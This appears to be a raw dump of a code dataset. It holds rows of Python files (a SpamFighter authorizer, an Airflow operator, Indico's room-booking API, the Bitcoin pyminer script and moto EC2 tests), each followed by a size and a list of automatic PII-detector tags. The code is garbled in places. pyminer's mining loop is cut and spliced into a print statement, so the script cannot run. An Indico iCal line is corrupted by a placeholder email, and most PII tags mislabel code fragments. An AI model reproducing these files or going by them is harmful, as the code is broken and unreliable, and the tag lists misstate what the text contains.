from spamfighter.core.domain import getDefaultDomain, BaseDomain
from spamfighter.plugin import loadPlugin, IDefaultDomainProvider
from spamfighter.utils import config
class NullPartner(object):
""""""
Партнер, авторизованный без логина/пароля (на доверии).
@ivar domain: корневой домен партнера
@type domain: L{BaseDomain}
""""""
implements(IPartner)
def __init__(self):
""""""
Конструктор.
""""""
domainProvider = loadPlugin(IDefaultDomainProvider, config.plugins.domain.null_partner_domain_provider)
self.domain = domainProvider.getDefaultDomain()
def rootDomain(self):
""""""
Получить корневой домен партнера.
@return: Deferred, корневой домен (L{IDomain})
@rtype: C{twisted.internet.defer.Deferred}
""""""
return defer.succeed(self.domain)
class NullPartnerAuthorizer(object):
""""""
Провайдер авторизации партнеров без логина/пароля (на доверии).
В этой ситуации доступ к СпамоБорцу ограничен с помощью других средств
(HTTP-proxy, firewall).
@ivar partner: единственный партнер, который обеспечивает весь доступ
@type partner: L{NullPartner}
""""""
implements(IPartnerAuthorizer)
def __init__(self):
""""""
Конструктор.
""""""
self.partner = NullPartner()
def authorize(self, partner_info):
""""""
Выполнить авторизацию партнера.
@param partner_info: информация о партнере
@return: Deferred, партнер (L{IPartner})
@rtype: C{twisted.internet.defer.Deferred}
""""""
if partner_info is not None:
return defer.fail(PartnerAuthorizationFailedError())
return defer.succeed(self.partner)
",2802,"[['EMAIL_ADDRESS', 'dummy@email.com'], ['DATE_TIME', 'SpamFighter, Copyright 2008'], ['DATE_TIME', '2009'], ['PERSON', 'Модуль авторизации'], ['PERSON', 'паролей'], ['PERSON', 'Партнер'], ['PERSON', 'Получить'], ['NRP', '@rtype'], ['NRP', 'Провайдер'], ['LOCATION', 'партнеров без логина'], ['LOCATION', 'доступ'], ['PERSON', 'который обеспечивает весь'], ['NRP', 'self.partner'], ['PERSON', 'Выполнить авторизацию'], ['NRP', '@rtype'], ['URL', 'http://netstream.ru/,'], ['URL', 'http://www.gnu.org/licenses/'], ['URL', 'email.com'], ['URL', 'zope.int'], ['URL', 'twisted.int'], ['URL', 'spamfighter.int'], ['URL', 'spamfighter.core.pa'], ['URL', 'spamfighter.core.do'], ['URL', 'spamfighter.pl'], ['URL', 'config.plugins.domain.nu'], ['URL', 'self.do'], ['URL', 'domainProvider.ge'], ['URL', 'twisted.internet.defer.De'], ['URL', 'defer.su'], ['URL', 'self.do'], ['URL', 'self.pa'], ['URL', 'twisted.internet.defer.De'], ['URL', 'defer.su'], ['URL', 'self.pa']]"
65,"""""""
.. module:: operators.dive_operator
:synopsis: DivePythonOperator for use with TaskRunner
.. moduleauthor:: Laura Lorenz dummy@email.com
.. moduleauthor:: Miriam Sexton dummy@email.com
""""""
from airflow.operators import PythonOperator
from .dive_operator import DiveOperator
class DivePythonOperator(DiveOperator, PythonOperator):
""""""
Python operator that can send along data dependencies to its callable.
Generates the callable by initializing its python object and calling its method.
""""""
def __init__(self, python_object, python_method=""run"", *args, **kwargs):
self.python_object = python_object
self.python_method = python_method
kwargs['python_callable'] = None
super(DivePythonOperator, self).__init__(*args, **kwargs)
def pre_execute(self, context):
context.update(self.op_kwargs)
context.update({""data_dependencies"": self.data_dependencies})
instantiated_object = self.python_object(context)
self.python_callable = getattr(instantiated_object, self.python_method)
",1075,"[['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['PERSON', 'Laura Lorenz'], ['PERSON', 'Miriam Sexton'], ['IP_ADDRESS', ' '], ['IP_ADDRESS', ':: '], ['URL', 'email.com'], ['URL', 'email.com'], ['URL', 'self.py'], ['URL', 'self.py'], ['URL', 'self.py'], ['URL', 'self.py'], ['URL', 'self.py']]"
66,"# -*- coding: utf-8 -*-
##
##
## This file is part of Indico
## Copyright (C) 2002 - 2013 European Organization for Nuclear Research (CERN)
##
## Indico is free software: you can redistribute it and/or
## modify it under the terms of the GNU General Public License as
## published by the Free Software Foundation, either version 3 of the
## License, or (at your option) any later version.
##
## Indico is distributed in the hope that it will be useful, but
## WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
## GNU General Public License for more details.
##
## You should have received a copy of the GNU General Public License
## along with Indico. If not, see .
from datetime import datetime
import icalendar
import pytz
from babel.dates import get_timezone
from sqlalchemy import Time, Date
from sqlalchemy.sql import cast
from werkzeug.datastructures import OrderedMultiDict, MultiDict
from indico.core.config import Config
from indico.core.db import db
from indico.core.errors import IndicoError
from indico.modules.rb.utils import rb_check_user_access
from indico.modules.rb.models.reservations import Reservation, RepeatMapping, RepeatFrequency, ConflictingOccurrences
from indico.modules.rb.models.locations import Location
from indico.modules.rb.models.rooms import Room
from indico.util.date_time import utc_to_server
from indico.web.http_api import HTTPAPIHook
from indico.web.http_api.metadata import ical
from indico.web.http_api.responses import HTTPAPIError
from indico.web.http_api.util import get_query_parameter
from MaKaC.authentication import AuthenticatorMgr
from MaKaC.common.info import HelperMaKaCInfo
class RoomBookingHookBase(HTTPAPIHook):
GUEST_ALLOWED = False
def _getParams(self):
super(RoomBookingHookBase, self)._getParams()
self._fromDT = utc_to_server(self._fromDT.astimezone(pytz.utc)).replace(tzinfo=None) if self._fromDT else None
self._toDT = utc_to_server(self._toDT.astimezone(pytz.utc)).replace(tzinfo=None) if self._toDT else None
self._occurrences = _yesno(get_query_parameter(self._queryParams, ['occ', 'occurrences'], 'no'))
def _hasAccess(self, aw):
return Config.getInstance().getIsRoomBookingActive() and rb_check_user_access(aw.getUser())
@HTTPAPIHook.register
class RoomHook(RoomBookingHookBase):
# e.g. /export/room/CERN/23.json
TYPES = ('room',)
RE = r'(?P[\w\s]+)/(?P\w+(?:-[\w\s]+)*)'
DEFAULT_DETAIL = 'rooms'
MAX_RECORDS = {
'rooms': 500,
'reservations': 100
}
VALID_FORMATS = ('json', 'jsonp', 'xml')
def _getParams(self):
super(RoomHook, self)._getParams()
self._location = self._pathParams['location']
self._ids = map(int, self._pathParams['idlist'].split('-'))
if self._detail not in {'rooms', 'reservations'}:
raise HTTPAPIError('Invalid detail level: %s' % self._detail, 400)
def export_room(self, aw):
loc = Location.find_first(name=self._location)
if loc is None:
return
# Retrieve rooms
rooms_data = list(Room.get_with_data('vc_equipment', 'non_vc_equipment',
filters=[Room.id.in_(self._ids), Room.location_id == loc.id]))
# Retrieve reservations
reservations = None
if self._detail == 'reservations':
reservations = OrderedMultiDict(_export_reservations(self, True, False, [
Reservation.room_id.in_(x['room'].id for x in rooms_data)
]))
for result in rooms_data:
yield _serializable_room(result, reservations)
@HTTPAPIHook.register
class RoomNameHook(RoomBookingHookBase):
# e.g. /export/roomName/CERN/pump.json
GUEST_ALLOWED = True
TYPES = ('roomName', )
RE = r'(?P[\w\s]+)/(?P[\w\s\-]+)'
DEFAULT_DETAIL = 'rooms'
MAX_RECORDS = {
'rooms': 500
}
VALID_FORMATS = ('json', 'jsonp', 'xml')
def _getParams(self):
super(RoomNameHook, self)._getParams()
self._location = self._pathParams['location']
self._room_name = self._pathParams['room_name']
def _hasAccess(self, aw):
# Access to RB data (no reservations) is public
return Config.getInstance().getIsRoomBookingActive()
def export_roomName(self, aw):
loc = Location.find_first(name=self._location)
if loc is None:
return
search_str = '%{}%'.format(self._room_name)
rooms_data = Room.get_with_data('vc_equipment', 'non_vc_equipment',
filters=[Room.location_id == loc.id, Room.name.ilike(search_str)])
for result in rooms_data:
yield _serializable_room(result)
@HTTPAPIHook.register
class ReservationHook(RoomBookingHookBase):
# e.g. /export/reservation/CERN.json
TYPES = ('reservation', )
RE = r'(?P[\w\s]+(?:-[\w\s]+)*)'
DEFAULT_DETAIL = 'reservations'
MAX_RECORDS = {
'reservations': 100
}
VALID_FORMATS = ('json', 'jsonp', 'xml', 'ics')
@property
def serializer_args(self):
return {'ical_serializer': _ical_serialize_reservation}
def _getParams(self):
super(ReservationHook, self)._getParams()
self._locations = self._pathParams['loclist'].split('-')
def export_reservation(self, aw):
locations = Location.find_all(Location.name.in_(self._locations))
if not locations:
return
for room_id, reservation in _export_reservations(self, False, True):
yield reservation
@HTTPAPIHook.register
class BookRoomHook(HTTPAPIHook):
PREFIX = 'api'
TYPES = ('roomBooking',)
RE = r'bookRoom'
GUEST_ALLOWED = False
VALID_FORMATS = ('json', 'xml')
COMMIT = True
HTTP_POST = True
def _getParams(self):
super(BookRoomHook, self)._getParams()
self._fromDT = utc_to_server(self._fromDT.astimezone(pytz.utc)).replace(tzinfo=None) if self._fromDT else None
self._toDT = utc_to_server(self._toDT.astimezone(pytz.utc)).replace(tzinfo=None) if self._toDT else None
if not self._fromDT or not self._toDT or self._fromDT.date() != self._toDT.date():
raise HTTPAPIError('from/to must be on the same day')
elif self._fromDT >= self._toDT:
raise HTTPAPIError('to must be after from')
elif self._fromDT < datetime.now():
raise HTTPAPIError('You cannot make bookings in the past')
username = get_query_parameter(self._queryParams, 'username')
avatars = username and filter(None, AuthenticatorMgr().getAvatarByLogin(username).itervalues())
if not avatars:
raise HTTPAPIError('Username does not exist')
elif len(avatars) != 1:
raise HTTPAPIError('Ambiguous username ({} users found)'.format(len(avatars)))
avatar = avatars[0]
self._params = {
'room_id': get_query_parameter(self._queryParams, 'roomid'),
'reason': get_query_parameter(self._queryParams, 'reason'),
'booked_for': avatar,
'from': self._fromDT,
'to': self._toDT
}
missing = [key for key, val in self._params.iteritems() if not val]
if missing:
raise HTTPAPIError('Required params missing: {}'.format(', '.join(missing)))
self._room = Room.get(self._params['room_id'])
if not self._room:
raise HTTPAPIError('A room with this ID does not exist')
def _hasAccess(self, aw):
if not Config.getInstance().getIsRoomBookingActive() or not rb_check_user_access(aw.getUser()):
return False
if self._room.can_be_booked(aw.getUser()):
return True
elif self._room.can_be_prebooked(aw.getUser()):
raise HTTPAPIError('The API only supports direct bookings but this room only allows pre-bookings.')
return False
def api_roomBooking(self, aw):
data = MultiDict({
'start_dt': self._params['from'],
'end_dt': self._params['to'],
'repeat_frequency': RepeatFrequency.NEVER,
'repeat_interval': 0,
'room_id': self._room.id,
'booked_for_id': self._params['booked_for'].getId(),
'contact_email': self._params['booked_for'].getEmail(),
'contact_phone': self._params['booked_for'].getTelephone(),
'booking_reason': self._params['reason']
})
try:
reservation = Reservation.create_from_data(self._room, data, aw.getUser())
except ConflictingOccurrences:
raise HTTPAPIError('Failed to create the booking due to conflicts with other bookings')
except IndicoError as e:
raise HTTPAPIError('Failed to create the booking: {}'.format(e))
db.session.add(reservation)
db.session.flush()
return {'reservationID': reservation.id}
def _export_reservations(hook, limit_per_room, include_rooms, extra_filters=None):
""""""Exports reservations.
:param hook: The HTTPAPIHook instance
:param limit_per_room: Should the limit/offset be applied per room
:param include_rooms: Should reservations include room information
""""""
filters = list(extra_filters) if extra_filters else []
if hook._fromDT and hook._toDT:
filters.append(cast(Reservation.start_dt, Date) <= hook._toDT.date())
filters.append(cast(Reservation.end_dt, Date) >= hook._fromDT.date())
filters.append(cast(Reservation.start_dt, Time) <= hook._toDT.time())
filters.append(cast(Reservation.end_dt, Time) >= hook._fromDT.time())
elif hook._toDT:
filters.append(cast(Reservation.end_dt, Date) <= hook._toDT.date())
filters.append(cast(Reservation.end_dt, Time) <= hook._toDT.time())
elif hook._fromDT:
filters.append(cast(Reservation.start_dt, Date) >= hook._fromDT.date())
filters.append(cast(Reservation.start_dt, Time) >= hook._fromDT.time())
filters += _get_reservation_state_filter(hook._queryParams)
occurs = [datetime.strptime(x, '%Y-%m-%d').date()
for x in filter(None, get_query_parameter(hook._queryParams, ['occurs'], '').split(','))]
data = ['vc_equipment']
if hook._occurrences:
data.append('occurrences')
order = {
'start': Reservation.start_dt,
'end': Reservation.end_dt
}.get(hook._orderBy, Reservation.start_dt)
if hook._descending:
order = order.desc()
reservations_data = Reservation.get_with_data(*data, filters=filters, limit=hook._limit, offset=hook._offset,
order=order, limit_per_room=limit_per_room, occurs_on=occurs)
for result in reservations_data:
yield result['reservation'].room_id, _serializable_reservation(result, include_rooms)
def _serializable_room(room_data, reservations=None):
""""""Serializable room data
:param room_data: Room data
:param reservations: MultiDict mapping for room id => reservations
""""""
data = room_data['room'].to_serializable('__api_public__')
data['_type'] = 'Room'
data['avc'] = bool(room_data['vc_equipment'])
data['vcList'] = room_data['vc_equipment']
data['equipment'] = room_data['non_vc_equipment']
if reservations is not None:
data['reservations'] = reservations.getlist(room_data['room'].id)
return data
def _serializable_room_minimal(room):
""""""Serializable minimal room data (inside reservations)
:param room: A `Room`
""""""
data = room.to_serializable('__api_minimal_public__')
data['_type'] = 'Room'
return data
def _serializable_reservation(reservation_data, include_room=False):
""""""Serializable reservation (standalone or inside room)
:param reservation_data: Reservation data
:param include_room: Include minimal room information
""""""
reservation = reservation_data['reservation']
data = reservation.to_serializable('__api_public__', converters={datetime: _add_server_tz})
data['_type'] = 'Reservation'
data['repeatability'] = None
if reservation.repeat_frequency:
data['repeatability'] = RepeatMapping.get_short_name(*reservation.repetition)
data['vcList'] = reservation_data['vc_equipment']
if include_room:
data['room'] = _serializable_room_minimal(reservation_data['reservation'].room)
if 'occurrences' in reservation_data:
data['occurrences'] = [o.to_serializable('__api_public__', converters={datetime: _add_server_tz})
for o in reservation_data['occurrences']]
return data
def _ical_serialize_repeatability(data):
start_dt_utc = data['startDT'].astimezone(pytz.utc)
end_dt_utc = data['endDT'].astimezone(pytz.utc)
WEEK_DAYS = 'MO TU WE TH FR SA SU'.split()
recur = ical.vRecur()
recur['until'] = end_dt_utc
if data['repeat_frequency'] == RepeatFrequency.DAY:
recur['freq'] = 'daily'
elif data['repeat_frequency'] == RepeatFrequency.WEEK:
recur['freq'] = 'weekly'
recur['interval'] = data['repeat_interval']
elif data['repeat_frequency'] == RepeatFrequency.MONTH:
recur['freq'] = 'monthly'
recur['byday'] = '{}{}'.format(start_dt_utc.day // 7, WEEK_DAYS[start_dt_utc.weekday()])
return recur
def _ical_serialize_reservation(cal, data, now):
start_dt_utc = data['startDT'].astimezone(pytz.utc)
end_dt_utc = datetime.combine(data['startDT'].date(), data['endDT'].timetz()).astimezone(pytz.utc)
event = icalendar.Event()
event.add('uid', dummy@email.com' % data['id'])
event.add('dtstamp', now)
event.add('dtstart', start_dt_utc)
event.add('dtend', end_dt_utc)
event.add('url', data['bookingUrl'])
event.add('summary', data['reason'])
event.add('location', u'{}: {}'.format(data['location'], data['room']['fullName']))
event.add('description', data['reason'].decode('utf-8') + '\n\n' + data['bookingUrl'])
if data['repeat_frequency'] != RepeatFrequency.NEVER:
event.add('rrule', _ical_serialize_repeatability(data))
cal.add_component(event)
def _add_server_tz(dt):
if dt.tzinfo is None:
return dt.replace(tzinfo=get_timezone(HelperMaKaCInfo.getMaKaCInfoInstance().getTimezone()))
return dt
def _yesno(value):
return value.lower() in {'yes', 'y', '1', 'true'}
def _get_reservation_state_filter(params):
cancelled = get_query_parameter(params, ['cxl', 'cancelled'])
rejected = get_query_parameter(params, ['rej', 'rejected'])
confirmed = get_query_parameter(params, ['confirmed'])
archived = get_query_parameter(params, ['arch', 'archived', 'archival'])
repeating = get_query_parameter(params, ['rec', 'recurring', 'rep', 'repeating'])
avc = get_query_parameter(params, ['avc'])
avc_support = get_query_parameter(params, ['avcs', 'avcsupport'])
startup_support = get_query_parameter(params, ['sts', 'startupsupport'])
booked_for = get_query_parameter(params, ['bf', 'bookedfor'])
filters = []
if cancelled is not None:
filters.append(Reservation.is_cancelled == _yesno(cancelled))
if rejected is not None:
filters.append(Reservation.is_rejected == _yesno(rejected))
if confirmed is not None:
if confirmed == 'pending':
filters.append(Reservation.is_pending)
elif _yesno(confirmed):
filters.append(Reservation.is_accepted)
else:
filters.append(~Reservation.is_accepted)
filters.append(Reservation.is_rejected | Reservation.is_cancelled)
if archived is not None:
filters.append(Reservation.is_archived == _yesno(archived))
if repeating is not None:
if _yesno(repeating):
filters.append(Reservation.repeat_frequency != 0)
else:
filters.append(Reservation.repeat_frequency == 0)
if avc is not None:
filters.append(Reservation.uses_vc == _yesno(avc))
if avc_support is not None:
filters.append(Reservation.needs_vc_assistance == _yesno(avc_support))
if startup_support is not None:
filters.append(Reservation.needs_assistance == _yesno(startup_support))
if booked_for:
like_str = '%{}%'.format(booked_for.replace('?', '_').replace('*', '%'))
filters.append(Reservation.booked_for_name.ilike(like_str))
return filters
",16517,"[['EMAIL_ADDRESS', 'dummy@email.com'], ['LOCATION', '#'], ['LOCATION', '#'], ['NRP', 'Indico'], ['DATE_TIME', '2002 - 2013'], ['LOCATION', '#'], ['LOCATION', '#'], ['NRP', 'indico.modules.rb.models.rooms'], ['LOCATION', 'super(RoomBookingHookBase'], ['PERSON', 'DEFAULT_DETAIL'], ['PERSON', 'jsonp'], ['PERSON', 'loc = Location.find_first(name='], ['PERSON', 'DEFAULT_DETAIL'], ['PERSON', 'jsonp'], ['PERSON', 'loc = Location.find_first(name='], ['PERSON', 'DEFAULT_DETAIL'], ['PERSON', 'jsonp'], ['PERSON', 'self)._getParams'], ['PERSON', 'self)._getParams'], ['DATE_TIME', ""the same day'""], ['PERSON', ""HTTPAPIError('You""], ['PERSON', 'NEVER'], ['PERSON', ""self._params['reason""], ['PERSON', 'db.session.flush'], ['PERSON', 'include_rooms'], ['PERSON', '.split'], ['PERSON', 'reservations_data = Reservation.get_with_data(*data'], ['PERSON', 'include_rooms'], ['NRP', 'MultiDict'], ['LOCATION', 'serializable_reservation(reservation_data'], ['DATE_TIME', 'daily'], ['DATE_TIME', 'weekly'], ['DATE_TIME', 'monthly'], ['DATE_TIME', 'WEEK_DAYS[start_dt_utc.weekday'], ['PERSON', ""data['id""], ['URL', 'event.ad'], ['URL', 'event.ad'], ['URL', 'event.ad'], ['URL', 'RepeatFrequency.NE'], ['PERSON', 'bookedfor'], ['URL', 'http://www.gnu.org/licenses/'], ['URL', 'indico.core.co'], ['URL', 'indico.co'], ['URL', 'indico.core.er'], ['URL', 'indico.mo'], ['URL', 'indico.modules.rb.models.re'], ['URL', 'indico.modules.rb.mo'], ['URL', 'indico.modules.rb.models.ro'], ['URL', 'indico.web.ht'], ['URL', 'indico.web.ht'], ['URL', 'api.me'], ['URL', 'indico.web.ht'], ['URL', 'api.re'], ['URL', 'indico.web.ht'], ['URL', 'MaKaC.au'], ['URL', 'MaKaC.common.in'], ['URL', 'fromDT.as'], ['URL', 'toDT.as'], ['URL', 'Config.ge'], ['URL', 'aw.ge'], ['URL', 'HTTPAPIHook.re'], ['URL', 'Location.fi'], ['URL', 'Room.ge'], ['URL', 'Room.id.in'], ['URL', 'loc.id'], ['URL', 'Reservation.ro'], ['URL', 'id.in'], ['URL', 'HTTPAPIHook.re'], ['URL', 'Config.ge'], ['URL', 'Location.fi'], ['URL', 'Room.ge'], ['URL', 'loc.id'], ['URL', 'Room.name.il'], ['URL', 'HTTPAPIHook.re'], ['URL', 'Location.fi'], ['URL', 'Location.name.in'], ['URL', 'HTTPAPIHook.re'], ['URL', 'fromDT.as'], ['URL', 'toDT.as'], ['URL', 'datetime.no'], ['URL', 'params.it'], ['URL', 'Room.ge'], ['URL', 'Config.ge'], ['URL', 'aw.ge'], ['URL', 'room.ca'], ['URL', 'aw.ge'], ['URL', 'room.ca'], ['URL', 'aw.ge'], ['URL', 'RepeatFrequency.NE'], ['URL', 'room.id'], ['URL', 'Reservation.cr'], ['URL', 'aw.ge'], ['URL', 'db.session.ad'], ['URL', 'db.se'], ['URL', 'reservation.id'], ['URL', 'Reservation.st'], ['URL', 'Reservation.st'], ['URL', 'Reservation.st'], ['URL', 'Reservation.st'], ['URL', 'datetime.st'], ['URL', 'Reservation.st'], ['URL', 'Reservation.st'], ['URL', 'order.de'], ['URL', 'Reservation.ge'], ['URL', 'reservations.ge'], ['URL', 'room.to'], ['URL', 'reservation.to'], ['URL', 'reservation.re'], ['URL', 'RepeatMapping.ge'], ['URL', 'reservation.re'], ['URL', 'o.to'], ['URL', 'RepeatFrequency.MO'], ['URL', 'datetime.com'], ['URL', 'event.ad'], ['URL', 'email.com'], ['URL', 'event.ad'], ['URL', 'event.ad'], ['URL', 'event.ad'], ['URL', 'event.ad'], ['URL', 'event.ad'], ['URL', 'cal.ad'], ['URL', 'dt.tz'], ['URL', 'dt.re'], ['URL', 'HelperMaKaCInfo.ge'], ['URL', 'Reservation.is'], ['URL', 'Reservation.is'], ['URL', 'Reservation.is'], ['URL', 'Reservation.is'], ['URL', 'Reservation.is'], ['URL', 'Reservation.is'], ['URL', 'Reservation.is'], ['URL', 'Reservation.is'], ['URL', 'Reservation.re'], ['URL', 'Reservation.re'], ['URL', 'Reservation.us'], ['URL', 'Reservation.ne'], ['URL', 'Reservation.ne'], ['URL', 'for.re'], ['URL', 'Reservation.bo'], ['URL', 'name.il']]"
67,"#!/usr/bin/python
#
# Copyright (c) 2011 The Bitcoin developers
# Distributed under the MIT/X11 software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
import time
import json
import pprint
import hashlib
import struct
import re
import base64
import httplib
import sys
from multiprocessing import Process
ERR_SLEEP = 15
MAX_NONCE = 1000000L
settings = {}
pp = pprint.PrettyPrinter(indent=4)
class BitcoinRPC:
OBJID = 1
def __init__(self, host, port, username, password):
authpair = ""%s:%s"" % (username, password)
self.authhdr = ""Basic %s"" % (base64.b64encode(authpair))
self.conn = httplib.HTTPConnection(host, port, False, 30)
def rpc(self, method, params=None):
self.OBJID += 1
obj = { 'version' : '1.1',
'method' : method,
'id' : self.OBJID }
if params is None:
obj['params'] = []
else:
obj['params'] = params
self.conn.request('POST', '/', json.dumps(obj),
{ 'Authorization' : self.authhdr,
'Content-type' : 'application/json' })
resp = self.conn.getresponse()
if resp is None:
print ""JSON-RPC: no response""
return None
body = resp.read()
resp_obj = json.loads(body)
if resp_obj is None:
print ""JSON-RPC: cannot JSON-decode body""
return None
if 'error' in resp_obj and resp_obj['error'] != None:
return resp_obj['error']
if 'result' not in resp_obj:
print ""JSON-RPC: no result in object""
return None
return resp_obj['result']
def getblockcount(self):
return self.rpc('getblockcount')
def getwork(self, data=None):
return self.rpc('getwork', data)
def uint32(x):
return x & 0xffffffffL
def bytereverse(x):
return uint32(( ((x) << 24) | (((x) << 8) & 0x00ff0000) |
(((x) >> 8) & 0x0000ff00) | ((x) >> 24) ))
def bufreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
word = struct.unpack('@I', in_buf[i:i+4])[0]
out_words.append(struct.pack('@I', bytereverse(word)))
return ''.join(out_words)
def wordreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
out_words.append(in_buf[i:i+4])
out_words.reverse()
return ''.join(out_words)
class Miner:
def __init__(self, id):
self.id = id
self.max_nonce = MAX_NONCE
def work(self, datastr, targetstr):
# decode work data hex string to binary
static_data = datastr.decode('hex')
static_data = bufreverse(static_data)
# the first 76b of 80b do not change
blk_hdr = static_data[:76]
# decode 256-bit target value
targetbin = targetstr.decode('hex')
targetbin = targetbin[::-1] # byte-swap and dword-swap
targetbin_str = targetbin.encode('hex')
target = long(targetbin_str, 16)
# pre-hash first 76b of block header
static_hash = hashlib.sha256()
static_hash.update(blk_hdr)
for nonce in xrange(self.max_nonce):
# encode 32-bit nonce value
nonce_bin = struct.pack("" Upstream RPC result:"", result
def iterate(self, rpc):
work = rpc.getwork()
if work is None:
time.sleep(ERR_SLEEP)
return
if 'data' not in work or 'target' not in work:
time.sleep(ERR_SLEEP)
return
time_start = time.time()
(hashes_done, nonce_bin) = self.work(work['data'],
work['target'])
time_end = time.time()
time_diff = time_end - time_start
self.max_nonce = long(
(hashes_done * settings['scantime']) / time_diff)
if self.max_nonce > 0xfffffffaL:
self.max_nonce = 0xfffffffaL
if settings['hashmeter']:
print ""HashMeter(%d): %d hashes, %.2f Khash/sec"" % (
self.id, hashes_done,
(hashes_done / 1000.0) / time_diff)
if nonce_bin is not None:
self.submit_work(rpc, work['data'], nonce_bin)
def loop(self):
rpc = BitcoinRPC(settings['host'], settings['port'],
settings['rpcuser'], settings['rpcpass'])
if rpc is None:
return
while True:
self.iterate(rpc)
def miner_thread(id):
miner = Miner(id)
miner.loop()
if __name__ == '__main__':
if len(sys.argv) != 2:
print ""Usage: pyminer.py CONFIG-FILE""
sys.exit(1)
f = open(sys.argv[1])
for line in f:
# skip comment lines
m = re.search('^\s*#', line)
if m:
continue
# parse key=value lines
m = re.search('^(\w+)\s*=\s*(\S.*)$', line)
if m is None:
continue
settings[m.group(1)] = m.group(2)
f.close()
if 'host' not in settings:
settings['host'] = '127.0.0.1'
if 'port' not in settings:
settings['port'] = 9131
if 'threads' not in settings:
settings['threads'] = 1
if 'hashmeter' not in settings:
settings['hashmeter'] = 0
if 'scantime' not in settings:
settings['scantime'] = 30L
if 'rpcuser' not in settings or 'rpcpass' not in settings:
print ""Missing username and/or password in cfg file""
sys.exit(1)
settings['port'] = int(settings['port'])
settings['threads'] = int(settings['threads'])
settings['hashmeter'] = int(settings['hashmeter'])
settings['scantime'] = long(settings['scantime'])
thr_list = []
for thr_id in range(settings['threads']):
p = Process(target=miner_thread, args=(thr_id,))
p.start()
thr_list.append(p)
time.sleep(1) # stagger threads
print settings['threads'], ""mining threads started""
print time.asctime(), ""Miner Starts - %s:%s"" % (settings['host'], settings['port'])
try:
for thr_proc in thr_list:
thr_proc.join()
except KeyboardInterrupt:
pass
print time.asctime(), ""Miner Stops - %s:%s"" % (settings['host'], settings['port'])
",6434,"[['DATE_TIME', '2011'], ['PERSON', ""out_words.append(struct.pack('@I""], ['PERSON', 'Miner'], ['LOCATION', 'targetstr'], ['DATE_TIME', 'the first 76b of 80b'], ['DATE_TIME', '16'], ['PERSON', 'hash1 = hash1_o.digest'], ['LOCATION', 'hash_o.update(hash1'], ['PERSON', 'param_arr ='], ['PERSON', 'hashes_done'], ['DATE_TIME', 'time_end - time_start'], ['PERSON', 'hashes_done'], ['PERSON', 'hashes_done'], ['PERSON', 'scantime'], ['URL', 'http://www.opensource.org/licenses/mit-license.php.'], ['IP_ADDRESS', '::'], ['IP_ADDRESS', '127.0.0.1'], ['URL', 'pprint.Pr'], ['URL', 'self.au'], ['URL', 'self.co'], ['URL', 'httplib.HT'], ['URL', 'self.conn.re'], ['URL', 'self.au'], ['URL', 'self.conn.ge'], ['URL', 'resp.re'], ['URL', 'struct.pa'], ['URL', 'words.re'], ['URL', 'self.id'], ['URL', 'self.ma'], ['URL', 'datastr.de'], ['URL', 'targetstr.de'], ['URL', 'hashlib.sh'], ['URL', 'self.ma'], ['URL', 'struct.pa'], ['URL', 'hash.co'], ['URL', 'hashlib.sh'], ['URL', 'time.as'], ['URL', 'time.as'], ['URL', 'rpc.ge'], ['URL', 'time.as'], ['URL', 'rpc.ge'], ['URL', 'time.sl'], ['URL', 'time.sl'], ['URL', 'self.ma'], ['URL', 'self.ma'], ['URL', 'self.ma'], ['URL', 'self.id'], ['URL', 'self.su'], ['URL', 'self.it'], ['URL', 'sys.ar'], ['URL', 'pyminer.py'], ['URL', 'sys.ar'], ['URL', 're.se'], ['URL', 're.se'], ['URL', 'm.gr'], ['URL', 'm.gr'], ['URL', 'f.cl'], ['URL', 'p.st'], ['URL', 'time.sl'], ['URL', 'time.as'], ['URL', 'proc.jo'], ['URL', 'time.as']]"
68,"from __future__ import unicode_literals
from botocore.exceptions import ClientError
import pytest
from unittest import SkipTest
import base64
import ipaddress
import six
import boto
import boto3
from boto.ec2.instance import Reservation, InstanceAttribute
from boto.exception import EC2ResponseError
from freezegun import freeze_time
import sure # noqa
from moto import mock_ec2_deprecated, mock_ec2, settings
from tests import EXAMPLE_AMI_ID
from tests.helpers import requires_boto_gte
if six.PY2:
decode_method = base64.decodestring
else:
decode_method = base64.decodebytes
################ Test Readme ###############
def add_servers(ami_id, count):
conn = boto.connect_ec2()
for index in range(count):
conn.run_instances(ami_id)
@mock_ec2_deprecated
def test_add_servers():
add_servers(EXAMPLE_AMI_ID, 2)
conn = boto.connect_ec2()
reservations = conn.get_all_reservations()
assert len(reservations) == 2
instance1 = reservations[0].instances[0]
assert instance1.image_id == EXAMPLE_AMI_ID
############################################
@freeze_time(""2014-01-01 05:00:00"")
@mock_ec2_deprecated
def test_instance_launch_and_terminate():
conn = boto.ec2.connect_to_region(""us-east-1"")
with pytest.raises(EC2ResponseError) as ex:
reservation = conn.run_instances(EXAMPLE_AMI_ID, dry_run=True)
ex.value.error_code.should.equal(""DryRunOperation"")
ex.value.status.should.equal(400)
ex.value.message.should.equal(
""An error occurred (DryRunOperation) when calling the RunInstance operation: Request would have succeeded, but DryRun flag is set""
)
reservation = conn.run_instances(EXAMPLE_AMI_ID)
reservation.should.be.a(Reservation)
reservation.instances.should.have.length_of(1)
instance = reservation.instances[0]
instance.state.should.equal(""pending"")
reservations = conn.get_all_reservations()
reservations.should.have.length_of(1)
reservations[0].id.should.equal(reservation.id)
instances = reservations[0].instances
instances.should.have.length_of(1)
instance = instances[0]
instance.id.should.equal(instance.id)
instance.state.should.equal(""running"")
instance.launch_time.should.equal(""2014-01-01T05:00:00.000Z"")
instance.vpc_id.shouldnt.equal(None)
instance.placement.should.equal(""us-east-1a"")
root_device_name = instance.root_device_name
instance.block_device_mapping[root_device_name].status.should.equal(""in-use"")
volume_id = instance.block_device_mapping[root_device_name].volume_id
volume_id.should.match(r""vol-\w+"")
volume = conn.get_all_volumes(volume_ids=[volume_id])[0]
volume.attach_data.instance_id.should.equal(instance.id)
volume.status.should.equal(""in-use"")
with pytest.raises(EC2ResponseError) as ex:
conn.terminate_instances([instance.id], dry_run=True)
ex.value.error_code.should.equal(""DryRunOperation"")
ex.value.status.should.equal(400)
ex.value.message.should.equal(
""An error occurred (DryRunOperation) when calling the TerminateInstance operation: Request would have succeeded, but DryRun flag is set""
)
conn.terminate_instances([instance.id])
reservations = conn.get_all_reservations()
instance = reservations[0].instances[0]
